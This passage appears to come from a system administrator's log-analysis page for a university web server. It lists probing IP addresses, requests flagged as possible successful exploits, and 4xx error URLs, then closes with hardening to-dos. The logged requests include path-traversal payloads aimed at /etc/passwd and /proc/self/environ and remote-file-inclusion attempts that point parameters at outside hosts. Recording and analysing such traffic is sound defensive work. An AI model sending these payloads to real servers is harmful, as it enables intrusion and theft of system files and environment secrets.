strings that match one or more of a listing of strings that indicate a possible exploit): /index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /~lscharf/scripts/homepages.php.txt/index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 /~lscharf/scripts/index.php?body=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 Requests with error response codes 400 Bad Request HTTP/1.1: 10 Time(s) 404's //photo_comment.php?toroot=http://www.die- ... ad/fx29id.txt??: 1 Time(s) /3DLDV/wb23000/data.html: 2 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 2 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 4 Time(s) /Papers/ASNE2002Paper.pdf: 1 Time(s) /Papers/SNAME2003Grounding2.pdf: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 2 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 4 Time(s) /_vti_bin/shtml.exe/_vti_rpc: 4 Time(s) /_vti_inf.html: 4 Time(s) /cgi-bin/MachineInfo/cgi-bin/wrap/gurdal/: 1 Time(s) /cgi-bin/mt/mt-comments.cgi: 1 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1329: 1 Time(s) /cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&s ... ower+system+ppt: 1 Time(s) /include/images/trans.gif: 113 Time(s) /include/lib.inc.php?site_path=http://www. ... aries/id.txt???: 2 Time(s) /mail//bin/msgimport: 5 Time(s) /mail2//bin/msgimport: 5 Time(s) /mss2//bin/msgimport: 5 Time(s) /notified-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR ... 0YxNlMwNC5wZGY=: 1 Time(s) /notified-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR ... 29uaWNzLnBkZg==: 1 Time(s) /pubs/catalog/c523.htm: 1 Time(s) /rc//bin/msgimport: 5 Time(s) /rms//bin/msgimport: 5 Time(s) /round//bin/msgimport: 5 Time(s) /roundcube-0.1//bin/msgimport: 5 Time(s) /roundcube-0.2//bin/msgimport: 5 Time(s) /roundcube//bin/msgimport: 5 Time(s) /roundcubemail-0.1//bin/msgimport: 5 Time(s) /roundcubemail-0.2//bin/msgimport: 5 Time(s) /roundcubemail//bin/msgimport: 5 Time(s) /search.php: 6 Time(s) /sitemap.xml: 1 Time(s) /verify-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR1L ... 0YxNlMwNC5wZGY=: 1 Time(s) /verify-DSTA?aHR0cDovL3d3dy5hb2UudnQuZWR1L ... 29uaWNzLnBkZg==: 1 Time(s) /webmail//bin/msgimport: 5 Time(s) /webmail2//bin/msgimport: 5 Time(s) /wm//bin/msgimport: 5 Time(s) /~cdhall/MyMaps/Usage%20&%20FAQ.txt//?file ... ips_w/id.txt???: 1 Time(s) /~cwoolsey//photo_comment.php?toroot=http: ... ad/fx29id.txt??: 1 Time(s) /~cwoolsey/Advisees//photo_comment.php?tor ... ad/fx29id.txt??: 1 Time(s) /~cwoolsey/Advisees/Undergraduate//photo_c ... ad/fx29id.txt??: 1 Time(s) /~cwoolsey/Advisees/Undergraduate/FaruqueA ... ad/fx29id.txt??: 1 Time(s) /~hokiesat/hsat_files/filelist.xml: 1 Time(s) /~hokiesat/include/lib.inc.php?site_path=h ... aries/id.txt???: 2 Time(s) /~hokiesat/subs/gps-crosslink/Final%20APL% ... tation/out.html: 1 Time(s) /~hokiesat/subs/include/lib.inc.php?site_p ... aries/id.txt???: 2 Time(s) /~hokiesat/subs/power/S02%20documenta...ec ... ia/Roseid.txtt?: 3 Time(s) /~hokiesat/subs/wiring/New%20Stuff/Big%20B ... aries/id.txt???: 2 Time(s) /~hokiesat/subs/wiring/New%20Stuff/include ... aries/id.txt???: 2 Time(s) /~hokiesat/subs/wiring/include/lib.inc.php ... aries/id.txt???: 2 Time(s) /~mason/Mason_f/M96SC10.pdf//?f=http://www ... ia/Roseid.txtt?: 3 Time(s) 405 Method Not Allowed /~hokiesat/: 6 Time(s) /~mason/: 3 Time(s) 416 Request Range Not Satisfiable /~mason/Mason_f/ConfigAeroHiLift.pdf: 1 Time(s) ===== May 20, 2009 Log Analysis ===== A total of 6 sites probed the server 188.129.88.254 193.109.135.145 200.234.200.158 210.5.217.218 65.23.154.225 85.241.26.61 A total of 2 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit): /index.php?go=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP Response 200 /index.php?go=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 200 400 Bad Request /404.shtml: 1 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s) 403 Forbidden /research/: 20 Time(s) /research/?area_id=4: 1 Time(s) /research/?area_id=6: 1 Time(s) /research/?mode=area_selected&thesis_area=1: 1 Time(s) /research/?mode=area_selected&thesis_area=2: 1 Time(s) /research/?mode=area_selected&thesis_area=3: 1 Time(s) /research/?mode=area_selected&thesis_area=4: 1 Time(s) /research/?mode=area_selected&thesis_area=5: 1 Time(s) /research/?mode=area_selected&thesis_area=6: 1 Time(s) /robots.txt: 33 Time(s) 404 Not Found /%7Emason/Mason_f/errors.php?error=http:// ... ca/buggsbunny??: 1 Time(s) /%7Emason/Mason_f/source/mod/rss/view.php? ... ca/buggsbunny??: 1 Time(s) /%7Emason/Mason_f/source/mod/rss/view.php? ... oc/self/environ: 1 Time(s) /%7Emason/Mason_f/source/mod/rss/view.php? ... self/environ%00: 1 Time(s) /%7Emason/errors.php?error=http://www.long ... ca/buggsbunny??: 1 Time(s) /%7Emason/source/mod/rss/view.php?Codebase ... ca/buggsbunny??: 1 Time(s) /%7Emason/source/mod/rss/view.php?Codebase ... oc/self/environ: 1 Time(s) /%7Emason/source/mod/rss/view.php?Codebase ... self/environ%00: 1 Time(s) ////Packages.php?sourcedir=http://dunpo.wi ... et/id.txt?%0D??: 2 Time(s) //beacon/language/1/splash.lang.php?langua ... oc/self/environ: 1 Time(s) //beacon/language/1/splash.lang.php?langua ... self/environ%00: 1 Time(s) //include/bbs.lib.inc.php?site_path=http:/ ... data/idfx1.txt?: 1 Time(s) //new.php?id=http://80.24.176.145/time//appserv/file.txt???: 1 Time(s) //photo_comment.php?toroot=http://rsh.kiev ... ges/idfx1.txt??: 2 Time(s) //plugins/dbal.php?eqdkp_root_path=http:// ... aries/id.txt???: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s) /_vti_bin/_vti_aut/author.dll: 2 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 5 Time(s) /_vti_bin/shtml.exe/_vti_rpc: 4 Time(s) /_vti_inf.html: 4 Time(s) /a: 1 Time(s) /cgi-bin/mt/mt-comments.cgi: 3 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1329: 3 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1330: 3 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1331: 4 Time(s) /cgi-bin/mt/mt-search.cgi?IncludeBlogs=2&s ... esigns+for+kids: 1 Time(s) /cgi-bin/mt/mt-tb.cgi/1202: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s) /errors.php?error=http://www.longbeachphot ... ca/buggsbunny??: 3 Time(s) /favicon.ico: 24 Time(s) /general.php: 22 Time(s) /giving/general.php: 1 Time(s) /giving/wishlist.php: 2 Time(s) /groups/caplab/research/capvte: 1 Time(s) /help/login.php?PHPSESSID=02c369bd3ef20d55d6142b896b18b2f9: 1 Time(s) /home.php?pg=../../../../../../../../../.. ... oc/self/environ: 1 Time(s) /home.php?pg=../../../../../../../../../.. ... self/environ%00: 1 Time(s) /home.php?pg=http://www.longbeachphotosbc.ca/buggsbunny??: 1 Time(s) /news//new.php?id=http://80.24.176.145/tim ... erv/file.txt???: 1 Time(s) /organizations//beacon/language/1/splash.l ... oc/self/environ: 1 Time(s) /organizations//beacon/language/1/splash.l ... self/environ%00: 1 Time(s) /organizations/aiaa: 1 Time(s) /organizations/aiaa/: 3 Time(s) /organizations/aiaa//beacon/language/1/spl ... oc/self/environ: 1 Time(s) /organizations/aiaa//beacon/language/1/spl ... self/environ%00: 1 Time(s) /organizations/aiaa/errors.php?error=http: ... ca/buggsbunny??: 2 Time(s) /organizations/aiaa/home.php?pg=../../../. ... oc/self/environ: 1 Time(s) /organizations/aiaa/home.php?pg=../../../. ... self/environ%00: 1 Time(s) /organizations/aiaa/home.php?pg=http://www ... ca/buggsbunny??: 1 Time(s) /organizations/aiaa/images/Joshua_Davidson_Personal.jpg: 1 Time(s) /organizations/aiaa/index.php: 1 Time(s) /organizations/aiaa/index.php?go=../../../ ... oc/self/environ: 1 Time(s) /organizations/aiaa/index.php?go=../../../ ... self/environ%00: 1 Time(s) /organizations/aiaa/index.php?go=companies: 1 Time(s) /organizations/aiaa/index.php?go=contacts: 3 Time(s) /organizations/aiaa/index.php?go=http://ww ... ca/buggsbunny??: 1 Time(s) /organizations/aiaa/index.php?go=links: 2 Time(s) /organizations/aiaa/index.php?go=whatisaiaa: 1 Time(s) /organizations/aiaa/index.php?go=whatwedo: 1 Time(s) /organizations/aiaa/index.php?start_from=0 ... &subaction=&id=: 1 Time(s) /organizations/aiaa/index.php?start_from=2 ... &subaction=&id=: 1 Time(s) /organizations/aiaa/lutze/health/canadian- ... acy-viagra.html: 1 Time(s) /organizations/aiaa/lutze/health/viagra-ca ... acy-dosage.html: 1 Time(s) /organizations/errors.php?error=http://www ... ca/buggsbunny??: 2 Time(s) /organizations/home.php?pg=../../../../../ ... oc/self/environ: 1 Time(s) /organizations/home.php?pg=../../../../../ ... self/environ%00: 1 Time(s) /organizations/home.php?pg=http://www.long ... ca/buggsbunny??: 1 Time(s) /organizations/index.php: 1 Time(s) /organizations/index.php?go=../../../../.. ... oc/self/environ: 1 Time(s) /organizations/index.php?go=../../../../.. ... self/environ%00: 1 Time(s) /organizations/index.php?go=companies: 1 Time(s) /organizations/index.php?go=contacts: 1 Time(s) /organizations/index.php?go=http://www.lon ... ca/buggsbunny??: 1 Time(s) /organizations/index.php?go=../../../../.. ... oc/self/environ: 1 Time(s) /organizations/index.php?go=../../../../.. ... self/environ%00: 1 Time(s) /organizations/index.php?go=companies: 1 Time(s) /organizations/index.php?go=contacts: 1 Time(s) /organizations/index.php?go=http://www.lon ... ca/buggsbunny??: 1 Time(s) /organizations/index.php?go=links: 1 Time(s) /organizations/index.php?go=whatisaiaa: 1 Time(s) /organizations/index.php?go=whatwedo: 1 Time(s) /source/mod/rss/view.php?Codebase=../../.. ... oc/self/environ: 1 Time(s) /source/mod/rss/view.php?Codebase=../../.. ... self/environ%00: 1 Time(s) /source/mod/rss/view.php?Codebase=http://w ... ca/buggsbunny??: 1 Time(s) /sources/lostpw.php?CONFIG[path]=http://du ... et/id.txt?%0D??: 2 Time(s) /~cdhall/papers/AIAA-11014-738.pdf//?r=htt ... om/fx29id.txt??: 1 Time(s) /~cwoolsey//photo_comment.php?toroot=http: ... ges/idfx1.txt??: 2 Time(s) /~cwoolsey//plugins/dbal.php?eqdkp_root_pa ... aries/id.txt???: 1 Time(s) /~cwoolsey/Advisees//photo_comment.php?tor ... ges/idfx1.txt??: 2 Time(s) /~cwoolsey/Advisees/Undergraduate//photo_c ... ges/idfx1.txt??: 2 Time(s) /~cwoolsey/Advisees/Undergraduate/FaruqueA ... ges/idfx1.txt??: 2 Time(s) /~cwoolsey/Courses//plugins/dbal.php?eqdkp ... aries/id.txt???: 1 Time(s) /~cwoolsey/Courses/AOE3134//plugins/dbal.p ... aries/id.txt???: 1 Time(s) /~cwoolsey/Courses/AOE3134/Supplemental//p ... aries/id.txt???: 1 Time(s) /~cwoolsey/Courses/AOE3134/Supplemental/Ro ... aries/id.txt???: 2 Time(s) /~durham/AOE5214/Ch08.pdf//?x=http://www.r ... a2/drivid.txt??: 1 Time(s) /~hokiesat//include/bbs.lib.inc.php?site_p ... data/idfx1.txt?: 1 Time(s) /~hokiesat/Plans_Procedures_and_Results/Te ... es/editdata.mso: 2 Time(s) /~hokiesat/index2_files/filelist.xml: 1 Time(s) /~hokiesat/subs//include/bbs.lib.inc.php?s ... data/idfx1.txt?: 1 Time(s) /~hokiesat/subs/wiring//include/bbs.lib.in ... data/idfx1.txt?: 1 Time(s) /~hokiesat/subs/wiring/New%20Stuff//includ ... data/idfx1.txt?: 1 Time(s) /~hokiesat/subs/wiring/New%20Stuff/Big%20B ... data/idfx1.txt?: 1 Time(s) /~lscharf/scripts/homepages.php.txt%20%20/ ... om/fx29id.txt??: 2 Time(s) /~mason//photo_comment.php?toroot=http://r ... ges/idfx1.txt??: 2 Time(s) /~mason/Mason////Packages.php?sourcedir=ht ... et/id.txt?%0D??: 2 Time(s) /~mason/Mason/ACinfoTOC.html////Packages.p ... et/id.txt?%0D??: 2 Time(s) /~mason/Mason/ACinfoTOC.html//?sourcedir=h ... .241/id.txt????: 1 Time(s) /~mason/Mason/ACinfoTOC.html//?sourcedir=h ... et/id.txt?%0D??: 2 Time(s) /~mason/Mason/ACinfoTOC.html/sources/lostp ... et/id.txt?%0D??: 2 Time(s) /~mason/Mason/sources/lostpw.php?CONFIG[pa ... et/id.txt?%0D??: 2 Time(s) /~mason/Mason_f//photo_comment.php?toroot= ... ges/idfx1.txt??: 2 Time(s) /~mason/Mason_f/M96SC10.pdf//?f=http://www ... ia/Roseid.txtt?: 1 Time(s) /~mason/Mason_f/MailOrder.html: 1 Time(s) /~mason/Mason_f/MorphFinalRptF03.pdf//phot ... ges/idfx1.txt??: 2 Time(s) 405 Method Not Allowed /highlander.htm: 1 Time(s) /~cdhall/: 1 Time(s) /~hokiesat/: 5 Time(s) /~mason/: 2 Time(s) ===== to remove the PHPSESSIONIDs ===== [[http://www.ragepank.com/articles/26/disable-phpsessid/]] ===== Investigate modsecurity and suhosin =====